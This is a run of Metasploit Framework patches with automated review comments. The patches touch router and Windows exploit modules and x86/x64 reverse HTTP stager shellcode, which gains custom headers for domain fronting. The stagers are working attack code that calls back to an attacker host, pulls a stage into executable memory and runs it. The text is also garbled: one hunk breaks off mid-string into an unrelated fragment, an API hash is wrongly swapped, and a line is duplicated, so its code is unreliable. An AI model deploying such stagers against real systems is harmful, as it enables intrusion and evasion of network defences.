@@ -20,9 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands on DIR-850L routers - as an authenticated user. Unable to use Meterpreter payloads, or - any other payload besides linux/mipsbe/shell/reverse_tcp & occasionally - linux/mipsbe/shell_reverse_tcp. + as an authenticated user. Unable to use Meterpreter payloads. }, 'Author' => [ 'Mumbai ' # module From 7d1de9bc48ebe470c3dd0074feca9a688a817ae9 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sat, 4 Nov 2017 18:50:20 -0400 Subject: [PATCH 104/254] Fix removing the dropped files after exploitation --- modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb index 312d43b18b..6ca5c09d94 100644 --- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -134,9 +134,15 @@ class MetasploitModule < Msf::Exploit::Local register_files_for_cleanup(dll_path, lnk_path) end + def file_rm(file) + if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true) + @dropped_files.delete(file) + end + end + def generate_link(path) vprint_status("Generating LNK file to load: #{path}") - path << "\x00" + path += "\x00" # Do not use << here display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name comment = datastore['LnkComment'].dup << "\x00" From 77c13286e0554775bce25fc14b4f897067fb0d85 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Sun, 5 Nov 2017 13:41:29 -0600 Subject: [PATCH 105/254] Ensure closing script tag has necessary escape. --- modules/auxiliary/dos/http/ibm_lotus_notes2.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
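Review bot: The new `file_rm` override in cve_2017_8464_lnk_lpe.rb carries no comment saying why it exists or which method it replaces; the commit title ("Fix removing the dropped files after exploitation") is the only hint. A header along the lines of `# Override: only drop a file from @dropped_files once file_dropper_deleted? confirms it is gone, so cleanup is not marked done prematurely` would capture that, assuming that is the intent — the mixin it overrides is not visible here. Note also that when the guard is false the method returns nil rather than the result of `file_dropper_delete`, which may differ from what existing callers of file_rm expect; worth checking against the overridden definition. The enclosing class continues outside the hunk.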
diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb index 67df421cfd..996fc0733e 100644 --- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -52,7 +52,7 @@ setInterval(function(){ delete kins[k]; } } - w = open('data:text/html,} + end + end + + + def primer + generate_rtf + end +end From a78d8f83fc71ca5fe97aec3d32efea329e63cb44 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 18 Aug 2017 16:35:27 +1000 Subject: [PATCH 169/254] Add HTTP header support for Host/Cookie/Referer This is to start the support for things like domain fronting. --- lib/msf/core/handler/reverse_http.rb | 2 - lib/msf/core/payload/transport_config.rb | 28 +++-- lib/msf/core/payload/windows/reverse_http.rb | 108 +++++++++++++----- .../core/payload/windows/reverse_winhttp.rb | 46 ++++++-- .../core/payload/windows/x64/reverse_http.rb | 74 ++++++++++-- .../payload/windows/x64/reverse_winhttp.rb | 63 +++++++--- lib/rex/payloads/meterpreter/config.rb | 16 ++- 7 files changed, 248 insertions(+), 89 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index d9a1d7ff4d..5b0db244b5 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -347,8 +347,6 @@ protected blob = self.generate_stage( url: url, uuid: uuid, - lhost: uri.host, - lport: uri.port, uri: conn_id ) diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index c59c85577e..1f5daf9b42 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb 
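Review bot: Dropping `lhost:` and `lport:` from the generate_stage call in reverse_http.rb is not explained by the commit message, and the transport_config hunk in this same commit still reads `lhost: opts[:lhost] || ds['LHOST']`, so the stage's transport block now falls back to the datastore LHOST instead of the host the staging request actually used. If that is intentional (the fronted name now travels in the Host header), a comment at the call site such as `# lhost/lport deliberately come from the datastore, not the request URL` would spare the next reader the archaeology; if not, the two keys should be restored. The enclosing handler method starts and ends outside the hunk.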
@@ -56,16 +56,17 @@ module Msf::Payload::TransportConfig ds = opts[:datastore] || datastore { - scheme: ds['OverrideScheme'] || 'http', - lhost: opts[:lhost] || ds['LHOST'], - lport: (opts[:lport] || ds['LPORT']).to_i, - uri: uri, - ua: ds['MeterpreterUserAgent'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - proxy_type: ds['PayloadProxyType'], - proxy_user: ds['PayloadProxyUser'], - proxy_pass: ds['PayloadProxyPass'] + scheme: ds['OverrideScheme'] || 'http', + lhost: opts[:lhost] || ds['LHOST'], + lport: (opts[:lport] || ds['LPORT']).to_i, + uri: uri, + ua: ds['MeterpreterUserAgent'], + proxy_host: ds['PayloadProxyHost'], + proxy_port: ds['PayloadProxyPort'], + proxy_type: ds['PayloadProxyType'], + proxy_user: ds['PayloadProxyUser'], + proxy_pass: ds['PayloadProxyPass'], + custom_headers: get_custom_headers(ds) }.merge(timeout_config(opts)) end @@ -80,6 +81,13 @@ module Msf::Payload::TransportConfig private + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHost']}\r\n" if ds['HttpHost'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + end + def timeout_config(opts={}) ds = opts[:datastore] || datastore { diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 1c9b79b562..5ee674b3ac 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb 
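Review bot: `get_custom_headers` in transport_config.rb returns nil whenever HttpReferer is unset, because a Ruby method returns its last expression and `headers << ... if ds['HttpReferer']` evaluates to nil when the modifier is false, so a Host or Cookie header configured on its own is silently dropped from the transport config. The keys it reads (`HttpHost`, `HttpCookie`, `HttpReferer`) also differ from the options this commit registers in the Windows payload mixins (`HttpHeaderHost`, `HttpHeaderCookie`, `HttpHeaderReferer`), so as written none of the three is ever populated from the datastore. The copies of this method in reverse_http.rb and x64/reverse_http.rb use the `HttpHeader*` names and return nil for an empty string; this one should match them.
```ruby
  def get_custom_headers(ds)
    headers = ""
    headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost']
    headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie']
    headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer']
    headers.empty? ? nil : headers
  end
```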
@@ -36,7 +36,10 @@ module Payload::Windows::ReverseHttp
 OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']),
 OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']),
 OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']),
- OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']])
+ OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]),
+ OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+ OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+ OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
 ], self.class)
 end
@@ -47,22 +50,23 @@ module Payload::Windows::ReverseHttp ds = opts[:datastore] || datastore conf = { ssl: opts[:ssl] || false, - host: ds['LHOST'], + host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], - retry_wait: ds['StagerRetryWait'] + retry_wait: ds['StagerRetryWait'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space - conf[:url] = luri + generate_uri(opts) - conf[:exitfunk] = ds['EXITFUNC'] - conf[:ua] = ds['MeterpreterUserAgent'] - conf[:proxy_host] = ds['PayloadProxyHost'] - conf[:proxy_port] = ds['PayloadProxyPort'] - conf[:proxy_user] = ds['PayloadProxyUser'] - conf[:proxy_pass] = ds['PayloadProxyPass'] - conf[:proxy_type] = ds['PayloadProxyType'] + if self.available_space.nil? || required_space <= self.available_space + conf[:url] = luri + generate_uri(opts) + conf[:exitfunk] = ds['EXITFUNC'] + conf[:ua] = ds['MeterpreterUserAgent'] + conf[:proxy_host] = ds['PayloadProxyHost'] + conf[:proxy_port] = ds['PayloadProxyPort'] + conf[:proxy_user] = ds['PayloadProxyUser'] + conf[:proxy_pass] = ds['PayloadProxyPass'] + conf[:proxy_type] = ds['PayloadProxyType'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri @@ -71,6 +75,22 @@ module Payload::Windows::ReverseHttp generate_reverse_http(conf) end + # + # Generate the custom headers string + # + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] + headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] + headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + + if headers.length > 0 + headers + else + nil + end + end + # # Generate and compile the stager # 
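Review bot: `get_custom_headers` is added verbatim here and again in x64/reverse_http.rb further down, while transport_config.rb in the same commit carries a third, diverging copy (different datastore keys, different empty-string handling); one shared implementation would keep the header names and the empty-to-nil rule in a single place, and `headers.empty? ? nil : headers` reads better than the `if headers.length > 0` form in any case. Separately, rewriting the guard from `self.available_space &&` to `self.available_space.nil? ||` inverts what happens when the available space is unknown — the full configuration is now emitted instead of the small URI — which is unrelated to the header feature and deserves a comment such as `# unknown space: assume unconstrained and emit the full config`. The same guard change recurs in the winhttp and x64 hunks below.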
@@ -138,10 +158,23 @@ module Payload::Windows::ReverseHttp # Proxy options? space += 200 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end + # + # Convert a string into a NULL-terminated ASCII byte array + # + def asm_generate_ascii_array(str) + (str.to_s + "\x00"). + unpack("C*"). + map{ |c| "0x%.2x" % c }. + join(",") + end + # # Generate an assembly stub with the configured feature set and options. # @@ -155,6 +188,7 @@ module Payload::Windows::ReverseHttp # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS # @option opts [String] :proxy_user The optional proxy server username # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # @@ -181,6 +215,8 @@ module Payload::Windows::ReverseHttp proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) + http_open_flags = 0 secure_flags = 0 @@ -222,10 +258,10 @@ module Payload::Windows::ReverseHttp push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. push 0x696e6977 ; ... push esp ; Push a pointer to the "wininet" string on the stack. - push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wininet" ) xor ebx, ebx ; Set ebx to NULL to use in future arguments - ^ + ^ if proxy_enabled asm << %Q^ 
@@ -238,7 +274,7 @@ module Payload::Windows::ReverseHttp ; LPCTSTR lpszProxyName (via call) push 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3) push ebx ; LPCTSTR lpszAgent (NULL) - push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ else @@ -249,7 +285,7 @@ module Payload::Windows::ReverseHttp push ebx ; LPCTSTR lpszProxyName (NULL) push ebx ; DWORD dwAccessType (PRECONFIG = 0) push ebx ; LPCTSTR lpszAgent (NULL) - push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} call ebp ^ end @@ -267,10 +303,10 @@ module Payload::Windows::ReverseHttp db "#{opts[:url]}", 0x00 got_server_host: push eax ; HINTERNET hInternet (still in eax from InternetOpenA) - push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} call ebp mov esi, eax ; Store hConnection in esi - ^ + ^ # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it # doesn't set the Proxy-Authorization header on the CONNECT request. @@ -286,7 +322,7 @@ module Payload::Windows::ReverseHttp ; LPVOID lpBuffer (username from previous call) push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME) push esi ; hConnection - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -302,7 +338,7 @@ module Payload::Windows::ReverseHttp ; LPVOID lpBuffer (password from previous call) push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD) push esi ; hConnection - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpAddRequestHeaders')} call ebp ^ end 
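Review bot: In the proxy-password block the `InternetSetOptionA` hash is replaced with `Rex::Text.block_api_hash('wininet.dll', 'HttpAddRequestHeaders')`, but the surrounding lines still push `44 ; INTERNET_OPTION_PROXY_PASSWORD` and the connection handle, so this is still the InternetSetOptionA call; with that hash the stager would resolve and invoke a different wininet export with those arguments whenever a proxy password is configured. The line should read `push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}`, exactly as in the proxy-username block just above it. The enclosing asm_reverse_http method starts and ends outside the hunk.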
@@ -317,7 +353,7 @@ module Payload::Windows::ReverseHttp push edi ; server URI push ebx ; method push esi ; hConnection - push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} call ebp xchg esi, eax ; save hHttpRequest in esi ^ @@ -334,7 +370,6 @@ module Payload::Windows::ReverseHttp send_request: ^ - if opts[:ssl] asm << %Q^ ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); @@ -345,7 +380,7 @@ module Payload::Windows::ReverseHttp push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest - push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -354,17 +389,32 @@ module Payload::Windows::ReverseHttp httpsendrequest: push ebx ; lpOptional length (0) push ebx ; lpOptional (NULL) - push ebx ; dwHeadersLength (0) - push ebx ; lpszHeaders (NULL) + ^ + + if custom_headers + asm << %Q^ + push -1 ; dwHeadersLength (assume NULL terminated) + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + ^ + else + asm << %Q^ + push ebx ; HeadersLength (0) + push ebx ; Headers (NULL) + ^ + end + + asm << %Q^ push esi ; hHttpRequest - push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} call ebp test eax,eax jnz allocate_memory set_wait: push #{retry_wait} ; dwMilliseconds - push 0xE035F044 ; hash( "kernel32.dll", "Sleep" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep( dwMilliseconds ); ^ 
@@ -404,7 +454,7 @@ module Payload::Windows::ReverseHttp push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is - push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -418,7 +468,7 @@ module Payload::Windows::ReverseHttp push 8192 ; read length push ebx ; buffer push esi ; hRequest - push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index c6f1eb838b..f30dbefa15 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb 
@@ -29,24 +29,26 @@ module Payload::Windows::ReverseWinHttp # Generate the first stage # def generate(opts={}) + ds = opts[:datastore] || datastore conf = { - ssl: opts[:ssl] || false, - host: datastore['LHOST'] || '127.127.127.127', - port: datastore['LPORT'] + ssl: opts[:ssl] || false, + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:uri] = luri + generate_uri - conf[:exitfunk] = datastore['EXITFUNC'] + conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = datastore['PayloadProxyHost'] - conf[:proxy_port] = datastore['PayloadProxyPort'] - conf[:proxy_user] = datastore['PayloadProxyUser'] - conf[:proxy_pass] = datastore['PayloadProxyPass'] - conf[:proxy_type] = datastore['PayloadProxyType'] - conf[:retry_count] = datastore['StagerRetryCount'] - conf[:proxy_ie] = datastore['PayloadProxyIE'] + conf[:proxy_host] = ds['PayloadProxyHost'] + conf[:proxy_port] = ds['PayloadProxyPort'] + conf[:proxy_user] = ds['PayloadProxyUser'] + conf[:proxy_pass] = ds['PayloadProxyPass'] + conf[:proxy_type] = ds['PayloadProxyType'] + conf[:retry_count] = ds['StagerRetryCount'] + conf[:proxy_ie] = ds['PayloadProxyIE'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri @@ -93,6 +95,9 @@ module Payload::Windows::ReverseWinHttp # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 + # Custom headers? Ugh, impossible to tell + space += 512 * 2 + # The final estimated size space end 
@@ -167,6 +172,8 @@ module Payload::Windows::ReverseWinHttp proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) + http_open_flags = 0 secure_flags = 0 @@ -434,8 +441,23 @@ module Payload::Windows::ReverseWinHttp push ebx ; TotalLength [6] push ebx ; OptionalLength (0) [5] push ebx ; Optional (NULL) [4] + ^ + + if custom_headers + asm << %Q^ + push -1 ; dwHeadersLength (assume NULL terminated) [3] + call get_req_headers ; lpszHeaders (pointer to the custom headers) [2] + db #{custom_headers} + get_req_headers: + ^ + else + asm << %Q^ push ebx ; HeadersLength (0) [3] push ebx ; Headers (NULL) [2] + ^ + end + + asm << %Q^ push esi ; HttpRequest handle returned by WinHttpOpenRequest [1] push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} call ebp diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index a9048731b4..4821709236 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb 
@@ -36,7 +36,10 @@ module Payload::Windows::ReverseHttp_x64 OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) + OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]), + OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), + OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), + OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) ], self.class) end @@ -52,14 +55,14 @@ module Payload::Windows::ReverseHttp_x64 conf = { ssl: opts[:ssl] || false, - host: ds['LHOST'], + host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], - retry_wait: ds['StagerRetryWait'] + retry_wait: ds['StagerRetryWait'] } # add extended options if we do have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:url] = luri + generate_uri(opts) conf[:exitfunk] = ds['EXITFUNC'] conf[:ua] = ds['MeterpreterUserAgent'] @@ -68,6 +71,7 @@ module Payload::Windows::ReverseHttp_x64 conf[:proxy_user] = ds['PayloadProxyUser'] conf[:proxy_pass] = ds['PayloadProxyPass'] conf[:proxy_type] = ds['PayloadProxyType'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri 
@@ -76,6 +80,22 @@ module Payload::Windows::ReverseHttp_x64 generate_reverse_http(conf) end + # + # Generate the custom headers string + # + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] + headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] + headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + + if headers.length > 0 + headers + else + nil + end + end + # # Generate and compile the stager # @@ -89,6 +109,7 @@ module Payload::Windows::ReverseHttp_x64 pop rbp ; rbp now contains the block API pointer #{asm_reverse_http(opts)} ^ + Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string end @@ -137,10 +158,23 @@ module Payload::Windows::ReverseHttp_x64 # Proxy options? space += 200 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end + # + # Convert a string into a NULL-terminated ASCII byte array + # + def asm_generate_ascii_array(str) + (str.to_s + "\x00"). + unpack("C*"). + map{ |c| "0x%.2x" % c }. + join(",") + end + # # Generate an assembly stub with the configured feature set and options. # @@ -154,6 +188,7 @@ module Payload::Windows::ReverseHttp_x64 # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS # @option opts [String] :proxy_user The optional proxy server username # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # 
@@ -180,6 +215,8 @@ module Payload::Windows::ReverseHttp_x64 proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) + http_open_flags = 0 set_option_flags = 0 @@ -327,17 +364,15 @@ module Payload::Windows::ReverseHttp_x64 if retry_count > 0 asm << %Q^ - push #{retry_count} - pop rdi + push #{retry_count} + pop rdi ^ end - asm << %Q^ retryrequest: ^ - if opts[:ssl] asm << %Q^ internetsetoption: @@ -351,15 +386,30 @@ module Payload::Windows::ReverseHttp_x64 pop r9 ; dwBufferLength (4 = size of flags) mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp + + xor r8, r8 ; dwHeadersLen (0) ^ end - asm << %Q^ - httpsendrequest: - mov rcx, rsi ; hRequest (request handle) + if custom_headers + asm << %Q^ + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + pop rdx ; lpszHeaders + dec r8 ; dwHeadersLength (assume NULL terminated) + ^ + else + asm << %Q^ push rbx pop rdx ; lpszHeaders (NULL) - xor r8, r8 ; dwHeadersLen (0) + ^ + end + + + asm << %Q^ + mov rcx, rsi ; hRequest (request handle) + xor r9, r9 ; lpszVersion (NULL) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwOptionalLength (0) diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb index 7ba6de3b35..358115e464 100644 --- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb 
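Review bot: `xor r8, r8 ; dwHeadersLen (0)` is now emitted only inside the `if opts[:ssl]` branch, so on a non-SSL x64 stager r8 is never zeroed before HttpSendRequestA: the custom-headers path's `dec r8` then produces whatever r8 held minus one instead of -1, and the NULL-headers path passes an uninitialised dwHeadersLength (unless code outside the hunk guarantees r8 is zero, which this hunk does not show). Move the zeroing out of the SSL block into its own unconditional `asm << %Q^ xor r8, r8 ; dwHeadersLen (0) ^` placed just before `if custom_headers`, and while there drop one of the two consecutive `xor r9, r9 ; lpszVersion (NULL)` lines the merge left in the common block. The x64 winhttp hunk further down has the identical structure and needs the same two changes.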
@@ -30,24 +30,26 @@ module Payload::Windows::ReverseWinHttp_x64 # Generate the first stage # def generate(opts={}) + ds = opts[:datastore] || datastore conf = { - ssl: opts[:ssl] || false, - host: datastore['LHOST'] || '127.127.127.127', - port: datastore['LPORT'] + ssl: opts[:ssl] || false, + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:uri] = luri + generate_uri - conf[:exitfunk] = datastore['EXITFUNC'] + conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = datastore['PayloadProxyHost'] - conf[:proxy_port] = datastore['PayloadProxyPort'] - conf[:proxy_user] = datastore['PayloadProxyUser'] - conf[:proxy_pass] = datastore['PayloadProxyPass'] - conf[:proxy_type] = datastore['PayloadProxyType'] - conf[:retry_count] = datastore['StagerRetryCount'] - conf[:proxy_ie] = datastore['PayloadProxyIE'] + conf[:proxy_host] = ds['PayloadProxyHost'] + conf[:proxy_port] = ds['PayloadProxyPort'] + conf[:proxy_user] = ds['PayloadProxyUser'] + conf[:proxy_pass] = ds['PayloadProxyPass'] + conf[:proxy_type] = ds['PayloadProxyType'] + conf[:retry_count] = ds['StagerRetryCount'] + conf[:proxy_ie] = ds['PayloadProxyIE'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri @@ -95,6 +97,9 @@ module Payload::Windows::ReverseWinHttp_x64 # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end 
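Review bot: `space += 512` in required_space for ReverseWinHttp_x64 budgets half of what the x86 winhttp change in this same commit does (`512 * 2`), even though the x64 winhttp stager also encodes the headers with `asm_generate_wchar_array` (two bytes per character, per the hunk below); the line should read `space += 512 * 2`. Both figures are admitted guesses ("impossible to tell"), yet get_custom_headers(ds) is computed right here in generate, so the actual header length could feed the estimate if required_space can reach the datastore — its signature is outside the hunk, so I cannot confirm that.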
@@ -115,12 +120,18 @@ module Payload::Windows::ReverseWinHttp_x64 # Generate an assembly stub with the configured feature set and options. # # @option opts [Bool] :ssl Whether or not to enable SSL - # @option opts [String] :uri The URI to request during staging + # @option opts [String] :url The URI to request during staging # @option opts [String] :host The host to connect to # @option opts [Integer] :port The port to connect to - # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify, or nil # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [String] :proxy_host The optional proxy server host to use + # @option opts [Integer] :proxy_port The optional proxy server port to use + # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS + # @option opts [String] :proxy_user The optional proxy server username + # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up + # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # def asm_reverse_winhttp(opts={}) @@ -169,6 +180,8 @@ module Payload::Windows::ReverseWinHttp_x64 proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) + http_open_flags = 0x00000100 # WINHTTP_FLAG_BYPASS_PROXY_CACHE secure_flags = ( 0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID 
